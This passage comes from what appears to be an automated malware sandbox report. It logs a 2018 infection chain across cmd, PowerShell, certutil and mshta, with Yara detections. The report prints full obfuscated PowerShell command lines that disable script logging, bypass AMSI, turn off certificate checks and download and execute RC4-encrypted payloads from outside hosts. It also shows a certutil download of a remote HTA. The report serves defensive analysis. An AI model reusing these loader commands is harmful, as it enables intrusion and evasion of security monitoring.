'Sc','riptB')+('{2}{3}{0}{1}'-f 'kLogg','ing','l','oc')][('{0}{4}{2}{5}{1}{6}{7}{3}' -f 'Ena','o','eSc','ging','bl','riptBlockInv','ca','tionLog')]=0}${v`Al}= (^&('{2}{1}{0}'-f 'ablE','ARi','V') ('I'+'BhRw')).ValuE::('{1}{0}'-f'ew','n').Invoke();${V`Al}.('{1}{0}' -f 'd','Ad').Invoke(('{2}{0}{1}'-f 'p','tB','EnableScri')+('{2}{1}{0}' -f'ng','i','lockLogg'),0);${v`AL}.('{1}{0}'-f 'DD','A').Invoke(('{3}{4}{6}{2}{8}{7}{5}{0}{1}{9}'-f 'n','L','riptB','Enab','leS','catio','c','o','lockInv','ogging'),0);${G`PC}[((('{16}{0}{1}{17}{12}{24}{4}{2}{3}{10}{23}{13}{21}{22}{9}{8}{14}{19}{5}{15}{11}{18}{7}{6}{25}{20}'-f 'Y_L','OCA','E8','k','HIN','D','8kD','kDPowerShell','ies8kD','c','DS','ws','_','ware8kDPo','Microsoft8','Windo','HKE','L','8','k','riptB','l','i','oft','MAC','Sc'))-REpLaCe ([chAR]56+[chAR]107+[chAR]68),[chAR]92)+('{2}{1}{0}' -f 'ckLogging','o','l')]=${V`AL}}ELSe{ (.('{1}{0}'-f'I','gc') ('{1}{0}{2}'-f 'i','VaR','aBLE:7b1m') ).vaLUe.'GeTFIe`LD'(('{0}{1}{2}'-f 's','ign','atures'),'N'+('{3}{0}{1}{2}{4}' -f 't','a','t','onPublic,S','ic')).'S`ETv`ALuE'(${NU`ll},(.('{2}{1}{0}'-f'CT','-ObJE','NEw') ('{2}{5}{0}{1}{4}{7}{9}{8}{6}{3}' -f'E','Ct','Col','NG]','io','L','i','NS.GENE','sHSET[sTr','ric.HA')))} (^&('{1}{0}{2}{3}' -f 'b','geT-VARiA','L','e') ('{0}{1}' -f'mZ','S') -vAL ).'aSseM`B`LY'.('{2}{0}{1}'-f'Typ','E','GEt').Invoke(('{5}{7}{0}{1}{6}{8}{2}{4}{3}'-f'.Aut','om','AmsiUti','s','l','System.Manag','a','ement','tion.'))^\|^&('?'){${_}}^\|.('%'){${_}.('{1}{2}{0}'-f'IElD','G','EtF').Invoke(('{2}{0}{1}{3}'-f'iI','n','ams','itFailed'),('{4}{2}{0}{5}{1}{3}'-f'S','i','ic,','c','NonPubl','tat')).('{2}{1}{0}'-f 'e','u','SeTVal').Invoke(${n`Ull},${T`RuE})};}; ( ^&('{2}{0}{1}' -f'T-','vaRiAblE','GE') ('{1}{0}' -f'4K','0') ).valuE::'E`X`P`Ect100conTin`UE'=0;${wc}=.('{1}{0}{2}' -f 'ObJ','New-','eCT') ('{0}{2}{3}{1}'-f 'SYsteM.NeT','nT','.W','EbClIe');${u}=('{0}{2}{9}{6}{5}{1}{11}{10}{8}{3}{4}{7}'-f'Micro','17.005','soft Sk',' NT 10.','0 (162','Sync ','Drive','99)','ws','y','ndo','.0107.0008 ship; Wi');${w`C}.'HE`AdErS'.('{0}{1}' -f'AD','D').Invoke(('{1}{2}{0}{3}' -f'r-Age','U','se','nt'),${U});${w`c}.'PRO`xy'= $nVa1I::'D`EfauLTwEB`P`RO`xy';${w`C}.'PrO`XY'.'cRe`dE`NTI`ALs' = $KmD::'de`FAUltn`et`wo`RKCREDEnTIA`LS';${scRi`pT:p`RO`XY} = ${W`c}.'pR`oXy';${k}= ( .('{2}{1}{0}' -f'LE','ARiab','V') ('{1}{0}'-f 'vm','Bq') ).vAlUE::'aSC`iI'.('{0}{1}' -f'GETBYt','es').Invoke(('{4}{3}{6}{2}{1}{0}{5}' -f'ee5aa0e8b0','7ac','d','923','d20','889bb1e','3c7d7'));${R}={${D},${K}=${a`RGS};${s}=0..255;0..255^\|^&('%'){${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.'coU`Nt'])%256;${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]};${d}^\|^&('%'){${i}=(${i}+1)%256;${h}=(${h}+${s}[${I}])%256;${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]}};${da`Ta}=${w`c}.('{2}{1}{0}{3}'-f'Dat','OWNloAD','D','A').Invoke(('{8}{13}{16}{9}{12}{11}{15}{2}{10}{19}{0}{7}{20}{3}{17}{5}{4}{14}{6}{1}{18}'-f '5','n','/s','b3','8/dri','U','item/co','zbTpZA','https://api.','edrive.','!ArI-XS','0/shar','com/v1.','o','ve','es','n','-dz_o','tent','G7nP','N'));${IV}=${d`ATa}[0..3];${dA`Ta}=${dA`TA}[4..${d`Ata}.'L`E`NgtH'];-JoIn[CHar[]](^& ${r} ${da`Ta} (${i`V}+${k}))^\|.('{0}{1}'-f'IE','X')&& Set RBH=eChO ieX (gCi ENv:STi).VALUe ^\| pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN - && C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%'
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000000.16251752367.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000000.16251811007.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000000.16251871858.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000000.16251952862.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.16511624641.000C0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.16511858528.004E0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.16511656893.000E8000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.16511692083.000FE000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.16252061690.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3780 Parent PID: 3756

General

Start time:	13:44:37
Start date:	19/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000000.16252582166.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000000.16252700862.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000000.16252640147.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000000.16252495561.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.16516367054.00240000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.16252867730.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.16516412332.00350000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.16516456299.0038D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.16516425523.00377000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3788 Parent PID: 3780

General

Start time:	13:44:38
Start date:	19/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c' eChO ieX (gCi ENv:STi).VALUe '
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000000.16252991335.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000000.16253360353.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000000.16253534240.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.16254060832.00280000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.16254080364.002A7000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.16254122513.00410000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000003.16253657832.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000000.16253457890.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 3796 Parent PID: 3780

General

Start time:	13:44:38
Start date:	19/06/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN -
Imagebase:	0x227b0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.16253760975.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.16253931601.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.16254018589.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.16254142755.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.16517606816.002E0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.16517720716.00370000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.16518717374.01280000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.16518634850.01260000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.16518183828.005A0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000003.16254299738.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000003.16257125734.00386000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000003.16257155189.00355000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000003.16257356049.0035A000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000003.16257308570.0032B000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000003.16257262767.00310000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.16517628488.00307000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: certutil.exe PID: 3832 Parent PID: 3796

General

Start time:	13:44:44
Start date:	19/06/2018
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta
Imagebase:	0x880000
File size:	903168 bytes
MD5 hash:	0D52559AEF4AA5EAC82F530617032283
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000000.16266903266.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000000.16269518741.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000000.16269739444.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000000.16269838618.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16278676993.000B0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16278810878.00114000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16280469364.007F0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16280477576.00800000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16278760458.000F7000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16280487798.00810000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16278724742.000D0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000003.16270011304.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16280536226.0158D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000007.00000002.16281065527.01F78000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: mshta.exe PID: 4000 Parent PID: 1376

General

Start time:	13:44:55
Start date:	19/06/2018
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta'
Imagebase:	0x1000000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.16313509174.004C4000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.16313596373.00504000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.16313702173.00534000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000002.16313610905.0050D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16297070594.0053A000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16298019408.005CA000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16298064731.005CB000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16298398000.0052D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16298407717.00530000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16298971996.004D1000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16299132829.0052D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16299341957.00530000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16300255520.0052D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16300263613.00530000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16300337195.004C3000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16300979933.0052D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16300788955.00530000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16302598190.00504000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16303926726.00504000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16304261000.005B8000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16304546872.005BA000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16304603512.005BD000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16305887929.005C0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000009.00000003.16296997137.0052F000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4056 Parent PID: 4000

General

Start time:	13:44:56
Start date:	19/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'cachedGr','Setti','icy','ngs','oupPol'),'N'+('{0}{4}{2}{3}{1}' -f 'o','tic','c,St','a','nPubli'));If(${g`Pf}){${G`PC}=${g`Pf}.('{1}{0}{2}'-f 'VaL','Get','Ue').Invoke(${nu`Ll});IF(${g`pc}[('{1}{0}{2}'-f 'rip','Sc','tB')+('{0}{3}{2}{1}' -f 'lo','ogging','kL','c')]){${G`PC}[('{2}{0}{1}' -f'rip','tB','Sc')+('{2}{3}{0}{1}' -f'in','g','lockL','ogg')][('{3}{1}{0}{2}'-f 'ip','eScr','tB','Enabl')+('{0}{2}{1}'-f'lo','ing','ckLogg')]=0;${G`Pc}[('{2}{1}{0}'-f'iptB','r','Sc')+('{0}{2}{1}' -f'l','kLogging','oc')][('{3}{7}{0}{4}{2}{1}{6}{5}'-f'crip','nLo','Invocatio','Enabl','tBlock','ing','gg','eS')]=0}${V`Al}= ( VArIaBle Eip -vAL )::('{0}{1}' -f 'Ne','w').Invoke();${V`AL}.('{1}{0}'-f'dD','A').Invoke(('{0}{1}{3}{2}'-f'En','a','leScriptB','b')+('{2}{1}{0}' -f'gging','ckLo','lo'),0);${v`Al}.('{0}{1}' -f'A','Dd').Invoke(('{0}{8}{6}{5}{2}{3}{1}{4}{7}' -f 'E','Log','o','ckInvocation','g','Bl','bleScript','ing','na'),0);${g`PC}[((('{8}{12}{14}{15}{9}{5}{0}{6}{7}{3}{4}{10}{13}{1}{16}{2}{17}{11}' -f'Po','sTK','el','KSW','ind','TKS','liciesTKSMicrosof','tT','HKEY_LO','are','o','iptB','CAL_MACHIN','w','ETK','SSoftw','SPowerSh','lTKSScr'))-REpLace ([CHAR]84+[CHAR]75+[CHAR]83),[CHAR]92)+('{1}{2}{0}'-f 'ging','loc','kLog')]=${v`AL}}ELse{ ${tvr`32}.'GeTFiE`LD'(('{1}{2}{0}' -f 'es','si','gnatur'),'N'+('{2}{1}{0}'-f'Static','c,','onPubli')).('{2}{0}{1}' -f 'TV','Alue','Se').Invoke(${N`ULL},(^&('{3}{0}{1}{2}' -f 'ew-Ob','Je','ct','N') ('{4}{3}{0}{1}{2}{5}{6}' -f'Ns.','GENEric.HAShSE','t[','lLeCtIO','Co','strI','ng]')))} ( ItEM ('vARi'+'A'+'BL'+'e:gNF') ).'Va`LUE'.'aSS`EM`BLy'.('{1}{0}{2}'-f 'yp','GetT','E').Invoke(('{4}{0}{3}{6}{1}{5}{2}'-f 'anag','msi','ils','emen','System.M','Ut','t.Automation.A'))^\|^&('?'){${_}}^\|^&('%'){${_}.('{2}{1}{0}'-f 'd','FieL','GEt').Invoke(('{4}{0}{1}{3}{2}'-f 'a','il','d','e','amsiInitF'),('{1}{4}{2}{0}{3}' -f 'ic,Stati','NonPu','l','c','b')).('{1}{0}'-f'ue','SETVAL').Invoke(${n`ULL},${TR`Ue})};}; ( gi ('vArIabLE:rt'+'ha'+'C'+'5')).'v`AlUE'::'expEC`T`100conTin`Ue'=0;${wc}=^&('{1}{2}{0}' -f 'BjECt','NEw-','O') ('{2}{5}{3}{4}{1}{0}' -f'nt','Ie','SYST','eb','CL','EM.NET.W');${u}=('{0}{13}{12}{1}{9}{4}{8}{16}{15}{2}{14}{5}{11}{17}{7}{3}{6}{10}' -f 'Mozi','(Wind',' T','e G','ws','i','e','11.0) lik','NT','o','cko','dent/7','.0 ','lla/5','r','; WOW64;',' 6.1','.0; rv:'); ${R`TH`Ac5}::'SeRVERCEr`T`i`FiCateVALIDat`i`On`cAll`B`ACk' = {${t`Rue}};${Wc}.'HEAd`ERs'.('{1}{0}' -f 'd','Ad').Invoke(('{1}{3}{0}{2}'-f '-Ag','Us','ent','er'),${u});${wC}.'p`ROxY'= (Gci VaRIablE:qCj ).'va`lue'::'D`eFAU`ltW`EbPROXY';${Wc}.'prO`Xy'.'C`REdent`ia`LS' = ( DiR VARIable:Esy ).'Va`lUE'::'dEFAu`LtNETWoRk`C`Re`DENTIals';${k}= ( Get-vaRiablE R4Imz -VAl )::'aS`CIi'.('{0}{1}'-f 'GEtBy','tEs').Invoke(('{2}{1}{4}{6}{0}{3}{5}'-f'cee5aa0e8b08','3','d20923','89bb','c','1e','7d7d7a'));${r}={${D},${K}=${AR`Gs};${s}=0..255;0..255^\|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.'COU`NT'])%256;${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};${d}^\|.('%'){${I}=(${I}+1)%256;${h}=(${h}+${S}[${I}])%256;${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};${wC}.'Hea`D`ErS'.('{0}{1}' -f'AD','D').Invoke(('{1}{0}'-f'e','Cooki'),('{6}{2}{7}{8}{3}{5}{1}{4}{0}' -f 'ZB5Q=','mklQ','ssion=B43mgp','o69GDp','pT','3P','se','Q','4N'));${S`eR}=('{1}{2}{3}{5}{4}{6}{0}'-f':443','h','ttps:','//','nt','myse','.org');${t}=('{3}{4}{2}{1}{0}'-f'min.php','d','/a','/m','odules');${d`ATA}=${w`c}.('{1}{0}{2}' -f'NLOAdDaT','DOW','A').Invoke(${S`eR}+${t});${iV}=${D`ATA}[0..3];${DA`TA}=${dA`TA}[4..${d`Ata}.'L`eN`GTh'];-JoiN[ChAR[]](^& ${R} ${da`Ta} (${IV}+${k}))^\|.('{0}{1}' -f'I','EX') && sET OMWI=ecHo IEX (GI enV:Kjv).valUe ^\|powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -&& CMD.ExE /C%OmWi%'
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000000.16296484704.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000000.16296593702.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000000.16296702253.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000000.16296808424.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000002.16525541083.00150000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000002.16525844730.003F8000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000003.16296929519.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000003.16298971392.003E1000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000003.16298807624.003FC000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000003.16298689577.003F1000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000002.16525795636.003E1000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000002.16525712693.003B0000.00000004.sdmp, 